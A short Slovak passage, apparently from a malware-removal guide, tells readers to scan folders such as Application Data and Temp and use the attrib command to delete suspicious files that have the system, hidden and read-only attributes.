Podobná operácia musí byť vykonaná s ostatnými priečinkami vnorenými v adresári Windows.
Potrebujeme naskenovať ešte niekoľko adresárov ako napr Údaje aplikácie A tepl. Použite príkaz prívlastok ako je uvedené v tomto článku, a vymažte všetky súbory s atribútmi SHR, ktoré nesúvisia s systémové súbory a môže infikovať váš počítač.
